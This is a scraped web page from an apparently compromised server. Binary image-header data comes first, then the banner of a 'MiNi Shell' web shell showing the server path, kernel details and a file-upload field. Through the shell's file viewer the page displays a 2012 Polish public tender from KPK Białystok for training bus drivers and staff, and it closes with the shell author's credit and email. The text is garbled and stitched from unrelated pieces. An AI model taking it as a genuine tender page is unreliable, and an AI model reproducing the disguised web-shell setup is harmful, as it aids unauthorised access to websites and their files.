JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120405/106990-N-2012.html

<p class="kh_header"><b>Białystok: Przeprowadzenie szkoleń w 5 blokach tematycznych z zakresu: zarządzanie zespołem; obsługa klienta i budowanie relacji z pasażerem; topografia Białegostoku; metodyka prowadzeni szkoleń; obsługa klienta i budowanie relacji z klientem w ramach projektu Akademia umiejętności KPK Sp. z o.o współfinansowanego  przez Unię Europejską w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 106990 - 2012; data zamieszczenia: 05.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komunalne Przedsiębiorstwo Komunikacyjne sp.zo.o. , ul. Składowa 7, 15-399 Białystok, woj. podlaskie, tel. 085 7428223, faks 085 7428223.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń w 5 blokach tematycznych z zakresu: zarządzanie zespołem; obsługa klienta i budowanie relacji z pasażerem; topografia Białegostoku; metodyka prowadzeni szkoleń; obsługa klienta i budowanie relacji z klientem w ramach projektu Akademia umiejętności KPK Sp. z o.o współfinansowanego  przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń w 5 blokach tematycznych w ramach projektu Akademia umiejętności KPK 
Sp. z o.o. według poniższej listy:
1.	Zarządzanie zespołem - szkolenie dla kadry kierowniczej średniego szczebla:
a.	Szkolenie dla 21 osób, w podziale na 3 grupy po 7 osób. 
b.	Łączna liczba godzin zegarowych szkolenia: 48, 
c.	Każda grupa: 2 dni po 8 godzin zegarowych dziennie, łącznie 16 godz.
d.	Tematyka szkolenia: 
-	style zarządzania, rola lidera, 
-	delegowanie zadań, 
-	motywowanie pracowników, 
-	kontrola realizacji zadań. 

e.	Termin wykonania: do 31 stycznia 2013 r.
Szkolenia mogą się odbywać w dni powszednie, od piątku do soboty.
Wstępnie Zamawiający przewiduje, że szkolenia odbędą się w następujących miesiącach: wrzesień, grudzień  2012 r., styczeń 2013 r. Terminy mogą ulec zmianie w drodze konsultacji pomiędzy Zamawiającym a Wykonawcą.


2.	Obsługa klienta i budowanie relacji z pasażerem - szkolenie dla kierowców autobusów komunikacji miejskiej - pracowników KPK Sp. z o.;

a.	Szkolenie dla 240 kierowców, w podziale na 16 grup, po 15 osób w każdej grupie.
b.	Łączna liczba godzin zegarowych szkolenia: 96.
c.	Każda grupa: 6 godzin zegarowych w ciągu jednego dnia.
d.	Tematyka szkolenia: 
-	specyfika pracy w branży usługowej,
-	kształtowanie właściwych relacji z pasażerem, 
-	radzenie sobie w sytuacjach konfliktowych z pasażerami, 
-	skuteczne radzenie sobie ze stresem,
-	działanie w specyficznej sytuacji konfliktowej o bardzo krótkim czasie trwania (zdarzenia w autobusach),
-	umiejętność przekazywania krótkich, zrozumiałych komunikatów.


e.	Termin wykonania: do 31 maja 2013  r.
Szkolenia mogą się odbywać w soboty. Zamawiający dopuszcza przeprowadzenie najwyżej 1 szkolenia  w daną sobotę.
Wstępnie Zamawiający przewiduje, że szkolenia odbędą się w następujących miesiącach: wrzesień, październik, listopad  2012 r. oraz  luty, marzec, kwiecień, maj 2013 r. Terminy mogą ulec zmianie w drodze konsultacji pomiędzy Zamawiającym a Wykonawcą.


3.	Topografia i sieć komunikacyjna Białegostoku - szkolenie dla kierowców autobusów komunikacji miejskiej - pracowników KPK Sp. z o.;

a.	Szkolenie dla 240 kierowców, w podziale na 16 grup po 15 osób. 
b.	Łączna liczba godzin zegarowych szkolenia: 32.
c.	Każda grupa: 2 godz., w ciągu jednego dnia.
d.	Tematyka szkolenia: 
-	sieć połączeń komunikacji miejskiej w Białymstoku, 
-	najważniejsze zabytki i atrakcje turystyczne Białegostoku i okolic.
e.	Termin wykonania: do 31 maja 2013  r.
Szkolenia mogą się odbywać w soboty, łącznie ze szkoleniami wymienionymi w punkcie 2 - Obsługa klienta i budowanie relacji z pasażerem. Zamawiający dopuszcza przeprowadzenie najwyżej 1 szkolenia  w daną sobotę.

4.	Metodyka prowadzenia szkoleń - szkolenie dla kierowców, tzw. patronów, odpowiedzialnych za szkolenia stanowiskowe nowych kierowców, wprowadzający nowych pracowników.
a.	Szkolenie dla 24 kierowców w podziale na 2 grupy po 12 osób.
b.	Łączna liczba godzin zegarowych szkolenia: 16.
c.	Każda grupa: 8 godz., w ciągu jednego dnia.
d.	Tematyka szkolenia:
-	zasady uczenia się osób dorosłych, 
-	metody przekazywania wiedzy i umiejętności, 
-	metodyka instruktażu, 
-	ocena postępów w zdobywaniu nowej wiedzy i umiejętności.

e.	Termin wykonania: do 30 kwietnia 2013  r.
Szkolenia mogą się odbywać w soboty. Zamawiający dopuszcza przeprowadzenie najwyżej 1 szkolenia  w daną sobotę.
Wstępnie Zamawiający przewiduje, że szkolenia odbędą się w następujących miesiącach: wrzesień 2012 r. oraz  kwiecień 2013 r. Terminy mogą ulec zmianie w drodze konsultacji pomiędzy Zamawiającym a Wykonawcą.


5.	Obsługa klienta i budowanie relacji z klientem - szkolenie dla pracowników Stacji Obsługi KPK Sp. z o.;

a.	Szkolenie dla 60 pracowników warsztatu, w podziale na 4 grupy po 15 osób. 
b.	Łączna liczba godzin zegarowych szkolenia: 16, 
c.	Każda grupa: 4 godz. w ciągu jednego dnia.
d.	Tematyka szkolenia: 
-	kształtowanie właściwych relacji z klientami, 
-	zasady obsługi klientów, 
-	reagowanie na uwagi i reklamacje Klientów
-	skuteczne radzenie sobie ze stresem. 

e.	Termin wykonania: do 31 października 2012  r.
Szkolenia mogą się odbywać w soboty. Zamawiający dopuszcza przeprowadzenie najwyżej 1 szkolenia  w daną sobotę.
Wstępnie Zamawiający przewiduje, że szkolenia odbędą się w następujących miesiącach: wrzesień, październik  2012 r. Terminy mogą ulec zmianie w drodze konsultacji pomiędzy Zamawiającym a Wykonawcą.


6.	Informacje uzupełniające.
1)	Za godzinę szkolenia uznaje się godzinę zegarową, na którą składają się: 45 minut zajęć dydaktycznych i 15 minut przerwy. Szkolenia mogą być przeprowadzane na zasadzie łączenia czasu, np. w blokach 90 minut z dłuższą przerwą.
2)	Zamawiający udostępni na przeprowadzenie szkoleń salę konferencyjną dostosowaną do ilości szkolonych osób.


7.	Dodatkowy przedmiot zamówienia

1)	Wykonawca zapewnia podczas każdego szkolenia: wodę mineralną, kawę rozpuszczalną, herbatę, cukier, mleko do kawy, ciastka kruche, dostępne przez cały czas trwania szkolenia;
2)	Wykonawca zapewnienia materiały szkoleniowe dla każdego z uczestników, które przechodzą na własność uczestnika: zszyty podręcznik skrypt wraz z wykazem literatury dostosowanym do tematyki i harmonogramu szkolenia,
3)	Wykonawca jest zobowiązany do wystawienia zaświadczeń potwierdzających ukończenie szkolenia zgodnie z obowiązującymi przepisami oraz sporządzenie listy z potwierdzeniem ich otrzymania przez każdego z uczestników szkolenia; warunkiem wydania zaświadczenia jest uczestnictwo osoby szkolonej w co najmniej 80% godzin szkoleniowych określonych w programie szkolenia, 

Uwagi: Dostarczenie ww. napojów, ciastek, materiałów szkoleniowych, certyfikatów uczestnictwa należy wliczyć w cenę szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-2, 80.51.10.00-9, 80.52.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda w tym postępowaniu wniesienia wadium jako zabezpieczenia złożonej oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań w powyższym warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wskazać posiadanie wiedzy i doświadczenia poprzez wykazanie się należytym wykonaniem (a w przypadku świadczeń okresowych lub ciągłych, również wykonywaniem)  
a.	3 usług (każda usługa realizowana na podstawie odrębnej umowy) o wartości nie mniejszej niż 5 000 zł brutto każda polegających na przygotowaniu i przeprowadzeniu szkoleń z zakresu obsługi klienta w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, daty wykonania i nazwy odbiorców, popartych dokumentami potwierdzającymi, że usługi zostały wykonane należycie
i
b.	3 usług (każda usługa realizowana na podstawie odrębnej umowy) o wartości nie mniejszej niż 3 000 zł brutto każda polegających na przygotowaniu i przeprowadzeniu szkoleń z zakresu zarządzania zespołem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, daty wykonania i nazwy odbiorców, popartych dokumentami potwierdzającymi, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż dysponuje co najmniej 4 różnymi osobami zdolnymi do wykonania zamówienia, z których, w okresie ostatnich 3 lat przed upływem składania ofert:

a)	1 osoba przeprowadziła co najmniej 40 godzin zegarowych szkoleń z zakresu zarządzania zespołem,
b)	1 osoba przeprowadziła co najmniej 100 godzin zegarowych szkoleń z zakresu obsługi klienta,
c)	1 osoba przeprowadziła co najmniej 20 godzin  zegarowych szkoleń z zakresu metodyki prowadzenia szkoleń/instruktażu,
d)	1 osoba posiada uprawnienia przewodnika po województwie podlaskim i przeprowadziła co najmniej 10 godzin zegarowych szkoleń dotyczących atrakcji turystycznych Białegostoku lub dokonała prezentacji tych atrakcji dla co najmniej 5 grup wycieczkowych.
W wykazie osób stanowiącym załącznik nr 5 do SIWZ Wykonawca powinien wskazać 4 osoby, które nie mogą się powtarzać.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż dysponuje co najmniej 4 różnymi osobami zdolnymi do wykonania zamówienia, z których, w okresie ostatnich 3 lat przed upływem składania ofert:

a)	1 osoba przeprowadziła co najmniej 40 godzin zegarowych szkoleń z zakresu zarządzania zespołem,
b)	1 osoba przeprowadziła co najmniej 100 godzin zegarowych szkoleń z zakresu obsługi klienta,
c)	1 osoba przeprowadziła co najmniej 20 godzin  zegarowych szkoleń z zakresu metodyki prowadzenia szkoleń/instruktażu,
d)	1 osoba posiada uprawnienia przewodnika po województwie podlaskim i przeprowadziła co najmniej 10 godzin zegarowych szkoleń dotyczących atrakcji turystycznych Białegostoku lub dokonała prezentacji tych atrakcji dla co najmniej 5 grup wycieczkowych.
W wykazie osób stanowiącym załącznik nr 5 do SIWZ Wykonawca powinien wskazać 4 osoby, które nie mogą się powtarzać.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań w powyższym warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu.
Celem potwierdzenia spełniania warunków udziału w postępowaniu oraz uznania merytorycznej poprawności oferty, Zamawiający na podstawie art. 25 i 26 ust 2 P z p oraz rozporządzenia Prezesa RM z dn. 29.12.2009r w sprawie rodzajów dokumentów jakich może żądać zamawiający (Dz. U. z 2009r Nr 226 poz. 1817), żąda złożenia następujących oświadczeń i dokumentów jako załączników do oferty:
1)	Oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1  P z p - wzór załącznik Nr 2 do SIWZ.
W przypadku korzystania z potencjału technicznego lub finansowego lub osób innych podmiotów przy realizacji niniejszego zamówienia, Wykonawca załącza do oferty zobowiązanie (oświadczenie) podmiotu, w którym podmiot ten zobowiązuje się do udostępnienia Wykonawcy swojego potencjału i/lub osób zdolnych do wykonania niniejszego zamówienia.
2)	Wykaz osób przewidzianych do realizacji zamówienia, spełniających warunki określone w rozdz. VI pkt 3 - wypełniony zgodnie ze wzorem załącznik nr 5
3)	Wykaz wykonanych usług szkoleniowych, o których mowa w rozdz. VI pkt 2 - wypełniony zgodnie ze wzorem - załącznik nr 6.

2.	Dokumenty i oświadczenia potwierdzające brak podstaw do wykluczenia 
z postępowania.
Celem wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego, do oferty należy dołączyć następujące dokumenty:
1)	Oświadczenie o braku podstaw do wykluczenia z postępowania określonych w art. 24 ust 1 i 2 Pzp, wg wzoru - zał. nr 3.
2)	Aktualny odpis z właściwego rejestru sądowego - w przypadku spółek prawa handlowego i stowarzyszeń; wypis z rejestru przedsiębiorstw - w przypadku przedsiębiorstw państwowych wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonego dokumentu, wymaga się złożenia innego dokumentu wskazującego osobę uprawnioną do reprezentowania składającego ofertę. 
3)	Jeżeli Wykonawca jest osobą fizyczna prowadzącą działalność gospodarczą - składa oświadczenie wg wzoru - załącznik nr 4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zamawiający dopuszcza zmiany w treści umowy w czasie realizacji zamówienia. Zmiany te mogą dotyczyć:
a.	zapisów umowy wynikających ze zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, 
b.	treści umowy związanych i będących następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca Stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki, w ramach którego realizowana jest Umowa,
c.	postanowień umowy wynikających z  następstwa  zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia,
d.	rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez Strony,
e.	zmian teleadresowych Stron Umowy.
f.	zmiany osób uczestniczących w wykonywaniu zamówienia (wykładowców) -                                   gdy wykonawca nie będzie mógł w czasie realizacji zamówienia dysponować tą osobą, nowa - wskazana osoba musi spełniać wymagania określone w SIWZ
g.	rozwiązania umowy w sytuacji: gdy decyzje administracyjne lub zdarzenia losowe uniemożliwią Wykonawcy terminową realizację zamówienia, jej realizacja nie będzie leżała 
w interesie publicznym lub interesie Zamawiającego
h.	zmiany terminu szkolenia (dnia tygodnia lub miesiąca) w przypadku wynikającym z sytuacji organizacyjnej Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat KPK Sp. z o.o.
ul. Składowa 7
15-399 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 12:00, miejsce: Sekretariat KPK Sp. z o.o.
ul. Składowa 7
15-399 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com